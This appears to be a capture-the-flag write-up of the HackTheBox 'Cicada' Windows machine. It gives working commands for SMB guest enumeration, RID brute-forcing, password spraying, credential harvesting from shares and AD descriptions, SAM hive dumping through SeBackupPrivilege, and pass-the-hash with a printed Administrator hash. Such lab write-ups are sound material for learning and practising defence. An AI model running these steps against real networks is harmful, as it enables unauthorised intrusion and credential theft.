984 words
5 minutes
HTB: Cicada (Windows/Easy)

Recon šŸ•µļø#

Network Enumeration#

TCP Scan#

nmap -sCV -p- -vv -A -T5 -oA scan/normal $ip

Based on the TCP scan results, the following ports are available for further assessment:

53/tcpdomainttl 127 Simple DNS Plusopen
88/tcpkerberos-secttl 127 Microsoft Windows Kerberos (server time: 2025-02-13 16:47:56Z)open
135/tcpmsrpcttl 127 Microsoft Windows RPCopen
139/tcpnetbios-ssnttl 127 Microsoft Windows netbios-ssnopen
389/tcpldapttl 127 Microsoft Windows Active Directory LDAP (Domain: cicada.htb0., Site: Default-First-Site-Name)open
445/tcpmicrosoft-ds?ttl 127open
464/tcpkpasswd5?ttl 127open
636/tcpssl/ldapttl 127 Microsoft Windows Active Directory LDAP (Domain: cicada.htb0., Site: Default-First-Site-Name)open
3268/tcpldapttl 127 Microsoft Windows Active Directory LDAP (Domain: cicada.htb0., Site: Default-First-Site-Name)open
3269/tcpssl/ldapttl 127 Microsoft Windows Active Directory LDAP (Domain: cicada.htb0., Site: Default-First-Site-Name)open
5985/tcphttpttl 127 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)open

The scan reveals several open ports associated with Windows services, including Kerberos (port 88), which is used for authentication in Active Directory environments, and MSRPC (port 135), which facilitates inter-process communication on networked systems. Additionally, LDAP (ports 389, 636, 3268, and 3269) is present, which is utilized for directory services queries and authentication.

Other notable services include Kpasswd (port 464), used for Kerberos password changes, and SMB (ports 139 and 445), which provides file and printer sharing. These open ports indicate the presence of Active Directory services, warranting further enumeration to identify potential attack vectors.

Also, we can see the Domain name and the Domain Controller, so letā€™s add them to our /etc/hosts file:

echo "$ip CICADA-DC.cicada.htb cicada.htb" | sudo tee -a /etc/hosts

UDP scan#

./udpz $ip --retries 1 --timeout 20000

Based on the UDP scan results, no open ports were identified for further assessment.

SMB Enumeration#

One of the first things I like to check when assessing a Windows target is SMB. Recently, HackTheBox has adopted a more realistic approach by encouraging box creators to provide initial foothold credentials for Windows machines, reflecting real-world Windows/AD pentesting scenarios. However, since this box is slightly older, weā€™ll begin by checking for guest access, as there might be something useful waiting for us there:

nxc smb $ip -u 'guest' -p '' --shares

Pasted image 20250213111619.png

We can see that we have read access to the IPC$ share, which can be leveraged with tools like rpcclient to interact with the system and query more information. Additionally, there is a custom share named HR, which weā€™ll examine first to see if it contains any valuable information:

smbclient --no-pass //$ip/HR

We can see that there is a note from the HR department, which we can download using get "Notice from HR.txt".

Pasted image 20250213113133.png

Upon checking it, we see that the note is meant for a new employee and contains their default password to access their account and then change it:

Pasted image 20250213113355.png

Exploiting šŸ¦ˆ#


Finding The Mysterious New Employee#

Now that we have a password, all we need is a username. Letā€™s leverage our read rights on the IPC$ share to dump the usernames on the system by brute-forcing their RIDs :

nxc smb cicada.htb -u 'guest' -p '' --rid-brute | tee usernames.txt

Pasted image 20250213120015.png

cat usernames.txt | awk -F'\\' '/SidTypeUser/{print $2}' | awk '{print $1}' > usernames.list

Pasted image 20250213123930.png

After cleaning the list to contain only the usernames, we can use it for a password spray attack. In this type of attack, the same password ('Cicada$M6Corpb*@Lp#nZp!8') is tested against multiple usernames, avoiding repeated failed attempts on a single account (which can trigger account lockout). The command below will attempt to authenticate with each username in the list using the specified password:

nxc smb cicada.htb -u usernames.list -p 'Cicada$M6Corpb*@Lp#nZp!8' --continue-on-success

And We get a hit:

Pasted image 20250213124020.png


Finding Davidā€™s Password#

Letā€™s see what we can use these credentials for:

nxc smb cicada.htb -u 'michael.wrightson' -p 'Cicada$M6Corpb*@Lp#nZp!8' --shares

We can see that we have read access to the SYSVOL and NETLOGON shares, which we could use to dump LDAP data and generate information for BloodHound:

Pasted image 20250213124941.png

To do so, letā€™s first sync our time with the box:

sudo ntpdate $ip

And Now letā€™s generate the data:

python3 bloodhound.py --dns-tcp -ns $ip -d cicada.htb -u 'michael.wrightson' -p 'Cicada$M6Corpb*@Lp#nZp!8' -c all

After uploading the generated data and reviewing the users I found, I noticed that David left his password in cleartext format in the Description field:

Pasted image 20250213130837.png


Evil Emily#

Now that we have new credentials, letā€™s do the same with them and see what we can use them for:

nxc smb cicada.htb -u 'DAVID.ORELIOUS' -p 'aRt$Lp#7t*VQ!3' --shares

We can see that we can finally read the DEV share:

smbclient //$ip/DEV -U 'DAVID.ORELIOUS'

Inside the DEV share, we have found a backup script, so letā€™s download it:

Pasted image 20250213132148.png

The script provides us with the cleartext credentials of Emily

Pasted image 20250213132250.png


Letā€™s do the same as we did with the two previous users:

nxc smb cicada.htb -u 'emily.oscars' -p 'Q!3@Lp#M6b*7t*Vt' --shares

We do have read (and write) permissions on the last two shares:

Pasted image 20250213132612.png

But most importantly, Emily can log in to the system:

nxc winrm cicada.htb -u 'emily.oscars' -p 'Q!3@Lp#M6b*7t*Vt'

Pasted image 20250213132837.png

Letā€™s log in and get our user flag:

evil-winrm -i cicada.htb -u 'emily.oscars' -p 'Q!3@Lp#M6b*7t*Vt'

Pasted image 20250213133015.png

Privilege Escalation#

Looking at Emilyā€™s privileges, we can see that she has SeBackupPrivilege, which allows her to bypass file and directory permissions to retrieve any file she wants, according to the official documentation.

Pasted image 20250213134409.png

SeBackupPrivilegeĀ allows file content retrieval, even if the security descriptor on the file might not grant such access. A caller withĀ SeBackupPrivilegeĀ enabled obviates the need for any ACL-based security check.

Now, we have several options, but one that stands out is to simply steal the root flag:

robocopy C:\Users\Administrator\Desktop C:\Temp root.txt /B  

alt text

However, that isnā€™t as satisfying as the best option, which is to back up the SAM files and then dump all the users and their hashes to get the administratorā€™s hash.

reg save hklm\sam sam.hive; reg save hklm\system system.hive
download *

After verifying that the files were indeed downloaded to our machine, letā€™s proceed using impacket:

impacket-secretsdump -sam sam.hive -system system.hive LOCAL

And we get the Administratorā€™s hash:

Pasted image 20250213145534.png

We can use it in a Pass-The-Hash attack and get a shell as Administrator:

evil-winrm -i $ip -u Administrator -H '2b87e7c93a3e8a0ea4a581937016f341'

Pasted image 20250213145900.png

Conclusion šŸ#

Overall, this was an excellent easy-level box that was fun to play and consistently engaging throughout. Itā€™s beginner-friendly, providing a great opportunity to practice basic Windows enumeration while also preparing you to tackle more advanced boxes with larger and more complex Active Directory environments.

HTB: Cicada (Windows/Easy)
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